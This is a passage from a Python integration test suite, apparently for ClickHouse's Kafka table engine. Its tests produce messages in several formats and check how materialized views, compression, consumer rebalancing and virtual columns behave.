# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
def decode_avro(message):
b = io.BytesIO(message)
ret = avro.datafile.DataFileReader(b, avro.io.DatumReader())
output = io.StringIO()
for record in ret:
print(record, file=output)
return output.getvalue()
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(kafka_cluster, name):
client = BrokerConnection('localhost', kafka_cluster.kafka_port, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print(("kafka_id is {}".format(kafka_id)))
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
# logging.debug("kafka is available - running test")
yield # run test
# Tests
def test_kafka_issue11308(kafka_cluster):
# Check that matview does respect Kafka SETTINGS
kafka_produce(kafka_cluster, 'issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }',
'{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
def test_kafka_issue4116(kafka_cluster):
# Check that format_csv_delimiter parameter works now - as part of all available format settings.
kafka_produce(kafka_cluster, 'issue4116', ['1|foo', '2|bar', '42|answer', '100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_commit_on_select = 1,
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
def test_kafka_consumer_hang(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "consumer_hang"
kafka_create_topic(admin_client, topic_name, num_partitions=8)
instance.query(f'''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
instance.wait_for_log_line('kafka.*Stalled', repetitions=20)
# This should trigger heartbeat fail,
# which will trigger REBALANCE_IN_PROGRESS,
# and which can lead to consumer hang.
kafka_cluster.pause_container('kafka1')
instance.wait_for_log_line('heartbeat error')
kafka_cluster.unpause_container('kafka1')
# logging.debug("Attempt to drop")
instance.query('DROP TABLE test.kafka')
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# original problem appearance was a sequence of the following messages in librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# so it was waiting forever while the application will execute queued rebalance callback
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
# cleanup unread messages so kafka will not wait reading consumers to delete topic
instance.query(f'''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_commit_on_select = 1,
kafka_group_name = '{topic_name}',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
''')
num_read = int(instance.query('SELECT count() FROM test.kafka'))
logging.debug(f"read {num_read} from {topic_name} before delete")
instance.query('DROP TABLE test.kafka')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_consumer_hang2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "consumer_hang2"
kafka_create_topic(admin_client, topic_name)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_commit_on_select = 1,
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_commit_on_select = 1,
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# first consumer subscribe the topic, try to poll some data, and go to rest
instance.query('SELECT * FROM test.kafka')
# second consumer do the same leading to rebalance in the first
# consumer, try to poll some data
instance.query('SELECT * FROM test.kafka2')
# echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# first consumer has pending rebalance callback unprocessed (no poll after select)
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
kafka_delete_topic(admin_client, topic_name)
def test_kafka_csv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_commit_on_select = 1,
kafka_group_name = 'csv',
kafka_format = 'CSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_tsv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce(kafka_cluster, 'tsv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_commit_on_select = 1,
kafka_group_name = 'tsv',
kafka_format = 'TSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_select_empty(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "empty"
kafka_create_topic(admin_client, topic_name)
instance.query(f'''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_commit_on_select = 1,
kafka_group_name = '{topic_name}',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
kafka_delete_topic(admin_client, topic_name)
def test_kafka_json_without_delimiter(kafka_cluster):
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_commit_on_select = 1,
kafka_format = 'JSONEachRow';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_protobuf(kafka_cluster):
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 0, 20)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 20, 1)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 21, 29)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_commit_on_select = 1,
kafka_schema = 'kafka.proto:KeyValuePair';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_string_field_on_first_position_in_protobuf(kafka_cluster):
# https://github.com/ClickHouse/ClickHouse/issues/12615
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 0, 20)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 20, 1)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 21, 29)
instance.query('''
CREATE TABLE test.kafka (
username String,
timestamp Int32
) ENGINE = Kafka()
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'string_field_on_first_position_in_protobuf',
kafka_group_name = 'string_field_on_first_position_in_protobuf',
kafka_format = 'Protobuf',
kafka_commit_on_select = 1,
kafka_schema = 'social:User';
''')
result = instance.query('SELECT * FROM test.kafka', ignore_error=True)
expected = '''\
John Doe 0 1000000
John Doe 1 1000001
John Doe 2 1000002
John Doe 3 1000003
John Doe 4 1000004
John Doe 5 1000005
John Doe 6 1000006
John Doe 7 1000007
John Doe 8 1000008
John Doe 9 1000009
John Doe 10 1000010
John Doe 11 1000011
John Doe 12 1000012
John Doe 13 1000013
John Doe 14 1000014
John Doe 15 1000015
John Doe 16 1000016
John Doe 17 1000017
John Doe 18 1000018
John Doe 19 1000019
John Doe 20 1000020
John Doe 21 1000021
John Doe 22 1000022
John Doe 23 1000023
John Doe 24 1000024
John Doe 25 1000025
John Doe 26 1000026
John Doe 27 1000027
John Doe 28 1000028
John Doe 29 1000029
John Doe 30 1000030
John Doe 31 1000031
John Doe 32 1000032
John Doe 33 1000033
John Doe 34 1000034
John Doe 35 1000035
John Doe 36 1000036
John Doe 37 1000037
John Doe 38 1000038
John Doe 39 1000039
John Doe 40 1000040
John Doe 41 1000041
John Doe 42 1000042
John Doe 43 1000043
John Doe 44 1000044
John Doe 45 1000045
John Doe 46 1000046
John Doe 47 1000047
John Doe 48 1000048
John Doe 49 1000049
'''
assert TSV(result) == TSV(expected)
def test_kafka_protobuf_no_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_commit_on_select = 1,
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 0, 20)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 20, 1)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
instance.query('''
CREATE TABLE test.kafka_writer (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_commit_on_select = 1,
kafka_schema = 'kafka.proto:KeyValuePair';
''')
instance.query("INSERT INTO test.kafka_writer VALUES (13,'Friday'),(42,'Answer to the Ultimate Question of Life, the Universe, and Everything'), (110, 'just a number')")
time.sleep(1)
result = instance.query("SELECT * FROM test.kafka ORDER BY key", ignore_error=True)
expected = '''\
13 Friday
42 Answer to the Ultimate Question of Life, the Universe, and Everything
110 just a number
'''
assert TSV(result) == TSV(expected)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
def test_kafka_recreate_kafka_table(kafka_cluster):
'''
Checks that materialized view work properly after dropping and recreating the Kafka table.
'''
# line for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "recreate_kafka_table"
kafka_create_topic(admin_client, topic_name, num_partitions=6)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'recreate_kafka_table',
kafka_group_name = 'recreate_kafka_table_group',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 6,
kafka_flush_interval_ms = 1000,
kafka_skip_broken_messages = 1048577;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(120):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster,'recreate_kafka_table', messages)
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*recreate_kafka_table', repetitions=6, look_behind_lines=100)
instance.query('''
DROP TABLE test.kafka;
''')
kafka_produce(kafka_cluster,'recreate_kafka_table', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'recreate_kafka_table',
kafka_group_name = 'recreate_kafka_table_group',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 6,
kafka_flush_interval_ms = 1000,
kafka_skip_broken_messages = 1048577;
''')
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*recreate_kafka_table', repetitions=6, look_behind_lines=100)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.view")) == 240
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_delete_topic(admin_client, topic_name)
def test_librdkafka_compression(kafka_cluster):
"""
Regression for UB in snappy-c (that is used in librdkafka),
backport pr is [1].
[1]: https://github.com/ClickHouse-Extras/librdkafka/pull/3
Example of corruption:
2020.12.10 09:59:56.831507 [ 20 ] {} <Error> void DB::StorageKafka::threadFunc(size_t): Code: 27. DB::Exception: Cannot parse input: expected '"' before: 'foo"}': (while reading the value of key value): (at row 1)
To trigger this regression there should duplicated messages
Orignal reproducer is:
$ gcc --version |& fgrep gcc
gcc (GCC) 10.2.0
$ yes foobarbaz | fold -w 80 | head -n10 >| in-…
$ make clean && make CFLAGS='-Wall -g -O2 -ftree-loop-vectorize -DNDEBUG=1 -DSG=1 -fPIC'
$ ./verify in
final comparision of in failed at 20 of 100
"""
supported_compression_types = ['gzip', 'snappy', 'lz4', 'zstd', 'uncompressed']
messages = []
expected = []
value = 'foobarbaz'*10
number_of_messages = 50
for i in range(number_of_messages):
messages.append(json.dumps({'key': i, 'value': value}))
expected.append(f'{i}\t{value}')
expected = '\n'.join(expected)
for compression_type in supported_compression_types:
logging.debug(('Check compression {}'.format(compression_type)))
topic_name = 'test_librdkafka_compression_{}'.format(compression_type)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
kafka_create_topic(admin_client, topic_name, config={'compression.type': compression_type})
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = 'JSONEachRow',
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.consumer Engine=Log AS
SELECT * FROM test.kafka;
'''.format(topic_name=topic_name) )
kafka_produce(kafka_cluster, topic_name, messages)
instance.wait_for_log_line("Committed offset {}".format(number_of_messages))
result = instance.query('SELECT * FROM test.consumer')
assert TSV(result) == TSV(expected)
instance.query('DROP TABLE test.kafka SYNC')
instance.query('DROP TABLE test.consumer SYNC')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batchs of messages of size ~100Kb
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce(kafka_cluster, 'flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in list(offsets.items()):
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages * batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
def test_kafka_virtual_columns(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_config = {
# default retention, since predefined timestamp_ms is used.
'retention.ms': '-1',
}
kafka_create_topic(admin_client, "virt1", config=topic_config)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_commit_on_select = 1,
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
result = ''
while True:
result += instance.query(
'''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''',
ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_config = {
# default retention, since predefined timestamp_ms is used.
'retention.ms': '-1',
}
kafka_create_topic(admin_client, "virt2", config=topic_config)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'virt2', messages, 0)
sql = 'SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view ORDER BY kafka_key'
result = instance.query(sql)
iterations = 0
while not kafka_check_result(result, False, 'test_kafka_virtual2.reference') and iterations < 10:
time.sleep(3)
iterations += 1
result = instance.query(sql)
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_commit_on_select = 1,
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume(kafka_cluster, 'insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_config = {
# default retention, since predefined timestamp_ms is used.
'retention.ms': '-1',
}
kafka_create_topic(admin_client, "virt2_0", num_partitions=2, config=topic_config)
kafka_create_topic(admin_client, "virt2_1", num_partitions=2, config=topic_config)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
